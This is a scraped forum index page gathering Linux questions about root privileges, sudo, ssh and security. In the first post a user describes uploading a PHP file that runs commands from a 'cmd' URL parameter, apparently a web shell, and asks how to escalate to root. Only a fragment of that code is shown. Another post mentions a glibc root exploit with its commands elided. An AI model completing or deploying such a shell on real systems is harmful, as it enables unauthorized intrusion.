Security :: Privilege Escalation - Getting 'root' Privilege?

Dec 1, 2010

Currently as a part of an assignment I need to implement a reverse shell on a linux system. The system details are -Quote:Linux Kernal Version - 2.6Database - MySQLUsing web-server I could upload a php file which could execute the command on behalf of me. Now, I want to get root access so that I can get access to system's core files.My sample php file -

PHP Code:
<?php
if((!empty($_GET['cmd'])&&isSet($_GET['cmd'])))

[code]....

View 2 Replies


ADVERTISEMENT

Ubuntu Security :: Privilege Escalation / Compromising Administrator Rights

Jul 24, 2011

I have been wondering if a guest user could compromise a machine which is set in the following way: they are not able to open the computer case, to boot from either an USB flash drive or an optical-disc drive, nor have any knowledge of the administrator-user password. Thus, they are landing on their guess account, and have to work their privilege escalation from there.

Therefore, what can they do to gain it? Could they download or otherwise install or run from a thumb drive an application that could be used to crack the administrator-user password? Because, it seems to me, could they enter into the system such a password-cracking application, the whole system could be compromised given the administrator-user password contains less than 9-or-so characters. What do you think? Can I lend my computer to anybody without them having beforehand gained my trust in them? Is the reasoning reasonable?

View 9 Replies View Related

Fedora :: Missing Root Privilege Key Thingy

Apr 8, 2011

When I started using Fedora (with Gnome) a week ago, I noticed a key symbol in the system tray, or however you call that in the linux world ;-). I can't remember what it was called, but it appeared after I loaded a program or administrative function that required root privileges. If I understand correctly there's a certain timeout after you put in the root password that allows you to run more than one program with elevated privileges so you don't have to put in the root password all the time. I remember reading somewhere that you can change that timeout. This key symbol basically was a "screw the timeout, i'm done being root".

This key symbol doesn't appear anymore though and I'd really like it back.
I'm pretty sure, I didn't do anything to make it go away, as I didn't play around with any security settings.

It was a little tricky to search for this as I can't recall the actual name of this... key thingy..

View 14 Replies View Related

Ubuntu :: Root Access Is Required - Get Privilege?

Dec 10, 2010

I am traying to install an application on ubuntu, it asks me that I have to get root access. How can I get this previlige?

View 9 Replies View Related

General :: Giving Rm Root Privilege For A Particular Directory

Jul 7, 2009

I want to give root privilege to the command rm for only a directory Dir inside /local/home. How I can do that?

View 9 Replies View Related

OpenSUSE Install :: Lost Admin (Root) Privilege Password

Feb 28, 2011

I'm new to Linux (had some basic Unix experience in 1995 era). (Teenager) gave me HP2133 mini notebook running SUSE Linux Enterprise Desktop 10. Everything checks good (hardware and software), even wireless networking. Problem is she apparently created Admin/root password but says cannot remember. I cannot even set correct date time... yast is asking for root privilege:
Command: /sbin/yast2 time
Is there anything I can do to re-establish administrator privilege?

View 6 Replies View Related

General :: Ubuntu: Give Sftp Root Privilege To User?

Sep 18, 2010

This is my first thread ever to make on the linux forum, and I just began using linux Ubuntu Lucid for my server. Please bare with me because I think I am questioning such a basic question. How do you give sftp root privilege to user? I've made group "admin" and made 2 users under that group. Trying to upload a file onto a server using SFTP with one of the user and it fails and says "Permission denied."

I gave full sudo/root permission to the group "admin" from /usr/sbin/visudo I mainly use Tranmit4 but I also have filezilla. Or is there a way to run sudo command on either ftp client application?

View 14 Replies View Related

Ubuntu Security :: Automatic Sudo Privilege For Lacie 4L?

Nov 16, 2010

Users of Lacie's 4L which is used to burn labels for your Lightscribe disks, are required to have the app run with sudo privileges, (the command being: gksudo 4L-gui). On an older version of an Ubuntu install, I had it set up so that it did this automatically, without it, (or me), being asked for a password. I thought it was something I added to the sudoers file, to give 4l-gui automatic authority, but I forgot how i did it.

View 2 Replies View Related

General :: Root Privilege Required To Send A Wake-on-lan Magic Packet?

Sep 28, 2010

On Linux, is root privilege required to send a wake-on-lan magic packet? If it depends on how you send the magic packet, please let me know under what situation root is required.

View 1 Replies View Related

General :: Recursively Add Read Privilege To All The Files Under A Certain Directory?

Jan 18, 2010

I'm under linux . by default, other user can't read anything under my home directory. let's see my home directory is /home/superman , and I tried to use

chmod +r /home/superman

to let others can acess files under my home directory , but it does not work .

View 1 Replies View Related

Ubuntu :: Give A User Sudo Privilege From Command Line?

Mar 14, 2011

I adjusted some settings in the desktop settings folder in KDE. I had only one user account on the machine. Next time I rebooted I could not log into KDE (it kept bombing out). I had to log into the console. Finally I managed to create a new account with useradd but this user cannot sudo

My problem is that my home directory is encrypted, so I need a new user with sudo privileges to delete all the kde files and folders in my original users home directory so that I can start with a new KDE setup (which won�t be a bad thing since I tinkered a lot).

How can I add sudo privileges to the new account (I presume I can do it by logging in with my sudo account in a terminal login?

View 9 Replies View Related

Programming :: System Administrator Wants To Change The Privilege* Only To Users 1, 2 And 3 To Execute The File /bin/xxx?

May 1, 2010

due to an exercise in Operating Systems I have to do the following: There are 6 users, user1, user2 ... user6 with home directories /users/user1 ... users/user6. User1 to user3 belong to group1, user4 to user6 belong to group2. The System Administrator wants to change the privilege* only to users 1, 2 and 3 to execute the file /bin/xxx. Which are the commands he has to type in order to achieve the previous?*I'm not sure if this is the right translation.What I have come till now is: Code: $ chgrp group1 <name_of_file> but it seems too simple to be right.

View 1 Replies View Related

CentOS 5 :: Creating New CentOS 5.4 User With Specific Privilege?

Mar 23, 2010

I am looking to create a user to be able to do WinSCP or SSH into the system and only be able to see /var/www/html/joomla/ and that is it. I don't want them to be able to start or stop service but be able to upload and download files to the specific directory or change privileges of the mentioned directory. Is that possible? what commands should I run.

View 1 Replies View Related

Ubuntu Security :: Giving Root Permission To An Application But Without Running It As Root?

Jan 20, 2011

want to run VirtualBox with root permissions. Trouble is that only when run as root i can access attached USB devices inside of a virtual machine, otherwise, these a greyed out).Now running VirtualBox as a root user also changes the configuration folders, making all my virtual machines already defined disappear. I also don't want to copy all to the root configuration folders. Is there a way to give the VirtualBox root permissions but without actually running the application as a root user. Is it possible to do without changing the permissions of the non-root user, i.e. i don't want my user to have all root permissions, due to security considerations.

View 1 Replies View Related

Security :: Secure FTP - Root Privileges After Logging In Form A Macintosh And Could Browse The Root Directory

Apr 12, 2010

I run ProFTPd with TLS authentication on my Debian Lenny server. My problem is that despite of the fact that my users connect chrooted, one of my friends had root privileges after logging in form a Macintosh and could browse the root directory, too.

View 1 Replies View Related

Ubuntu Security :: Wireshark Security Root Privileges?

Mar 25, 2010

Having read on the forums about some of the dangers of running Wireshark as root, I would like to know if anyone can suggest some alternative packet sniffers/network analyzers which will offer similar results but without the security issues. I am using Karmic Koala on a Fujitsu Siemens laptop with wireless router (firewall enabled)

View 7 Replies View Related

Ubuntu Security :: Security E-mails At Root Login?

Sep 8, 2010

Whenever I login as root, an e-mail with the subject "Security information" is sent outwhere the e-mail address for this message is configured? I need to change it (or perhaps disable it).

View 9 Replies View Related

Fedora Security :: Become Root Without Root Password?

Oct 20, 2010

I found this on Bee's website. For more info on this exploit there are links there:[URl]..All you have to do in Fedora 13 is enter the following lines in a shell as normal user:

[Code]...

I don't think this can be considered solely an "upstream" problem, because I first tried it in Arch using the same version of glibc, and the final command causes both gnome-terminal and xterm windows to disappear.

View 14 Replies View Related

Fedora Security :: SSH Only As Root?

Aug 19, 2009

I have a fedora 10 server to which I can ssh as the root user using RSA.

However for any user other than root a password is always requested.

I have made changes to PAM and check the rights to all the files and read pages upon pages. I can mess it up completely so no one can login but cant get it so that anyone other than root can use a public key.

Another interesting and may be related item is that when any user logs in, with a password, via ssh then they get the error:

Could not chdir to home directory /home/xxxx: Permission denied

But they can cd to their home directory and have no problems.

I am thinking that this may be to do with the mount. The home directory is on a HDD but the system dive is an SSD.

I have gone over everything so many times I am now lost, I must be overlooking something so simple and obvious its just not coming to mind.

View 4 Replies View Related

Security :: Can't Su To Root, After Chmod -s /bin/su

Mar 7, 2011

When I try to issue "su -", I get "su: Authentication failure", and I'm 100% sure password I enter is ok.

I think it started to happen after I issued
chmod +s /usr/bin/screen
chmod 755 /usr/bin/screen
which I believe is unrelated to this problem, and,
chmod -s /bin/su (-s by mistake)
chmod 755 /bin/su
which most probably made the whole mess...

this is not the part of the problem I believe but here's some background why I did that... when trying to make possible for screen sessions to be started automatically on boot under non-root account, I entered something like "su - username -c "/usr/bin/screen -dmS screenname ./executable-file"" in bootmisc.sh, but I was getting "must run suid root for multiuser support", so I tried to fix it, and now I can't login to root account no way.

View 5 Replies View Related

Security :: Run Change As Not Root?

Jan 8, 2011

Running Debian lenny.Is there any way to run

Code:
$ chage --expiredate some_date user1
chage: Permission denied.

[code]....

View 3 Replies View Related

Security :: Run Commands As Root ?

Mar 4, 2010

I need to launch a bash file in Linux from an unprivileged user session, file that will run bash commands as root. But I do not want to create an user with root privileges to do that also the process must be silent (no password asked).

How can I do this without adding a user in sudoers and without giving rights to all users to execute the commands from that bash file?

I have tried SUID option witch would had been good as functionality but I understand that SUID doesn't work for script bash files.

View 14 Replies View Related

Fedora Security :: How To Become The Root On System

May 8, 2009

i still can't see quite well the security reason for not allowing one logging in as root on Fedora, but anyway...how to become the root on my system, Fedora 10, please?i did open a terminal and typed s - root then my password, now im the root, but only on the terminal, as CLI, but what if i want to change the munu.lst inside grub i.e.? and some other files or settings that there's no option to just type in the root password, how to overcome that please?

View 9 Replies View Related

Ubuntu Security :: 9.10 X64 Can't Login As Root

Aug 9, 2010

I've recently installed 64bit version of ubuntu 9.10 but the GDMsetup doesn't seem to be working as it was in 9.04 i mean to say when you type gdmsetup at console the login window pops up where i can check the check-box "Allow local administrator log in" under security tab. to enable login as root. since it is not working i've to type password every time when i install a package or create a folder in root directory or mount a drive which is quite irritating how can i login as root in gui mode etc... also is there some syntax which i can put into /etc/gdm/custom.conf so i can log in as root....

View 2 Replies View Related

Ubuntu Security :: WireShark - Do Not Run As Root

Nov 7, 2010

The Wireshark website specifically warns against running WireShark as Root....

Quote:

Administrator/root account not required!

Many Wireshark users think that Wireshark requires a root/Administrator account to work with.

That's not a good idea, as using a root account makes any exploit far more dangerous: a successful exploit will have immediate control of the whole system, compromising it completely.

First of all, most Wireshark functions can always be used with a (probably very limited) user account. In particular, the protocol dissectors which have shown most of the security related bugs do not need a root account!

Only capturing (and gathering capture interface information) may require a root account, but even that can usually be "circumvented", see CaptureSetup/CapturePrivileges for details how to do so.

View 3 Replies View Related

Ubuntu Security :: Can Ssh Into Root But Not User

Apr 22, 2011

Having trouble adding a regular user with ssh access on Hardy 8.04. I can ssh into root, but not into the newly created regular user with the same ~/.ssh/authorized_keys

Code:

sshd_config has:
AllowGroups sshlogin
AllowUsers user root

[code]....

what could be preventing ssh login to ~user? And yes I would like to disable root ssh access, but it would be nice to be able to ssh into user first

View 4 Replies View Related

Security :: Add Root Permissions To User ?

Jun 5, 2010

How do I add root permissions to my user account?

I want full permissions for all computers in my house, without having to get up and go to the other room and change permissions for the file, folder, drive, directory, computer, etc., then go back to the other room again.

I just created a partition, as THIS user, THIS machine, rebooted, and cannot create a folder on the partition I just created. UGH. No more of this stuff... I guess at the very least, I'll still have to log onto each machine for this?

View 12 Replies View Related

Security :: Log All The Commands Executed By Root ?

Aug 11, 2010

I want to get a of log all the commands executed by the root user with the following details :

incoming ip
username (thru which su was executed)
time and date
all the commands executed as mentioned above.

Also if user has managed to login as root, he should not be able to disable / delete the above info. Can this info be collected at some other physical server ?

View 5 Replies View Related

Security :: Using Sudo Instead Of Root Be Safer?

Apr 5, 2011

Consider: [URL]

In security terms, would using sudo instead of root be safer? I'd actually prefer to use this if so; I like sudo an awful lot. (It's Mark Shuttleworth's fault)

View 10 Replies View Related

Security :: Only Allow Root Ssh Access To The Server?

Feb 17, 2010

When creating 10 samba users I also created Linux users. I do not want these Samba users to be able to use putty, winscp etc to access the server.

Do you know how I can restrict ssh access to specific users?

View 6 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved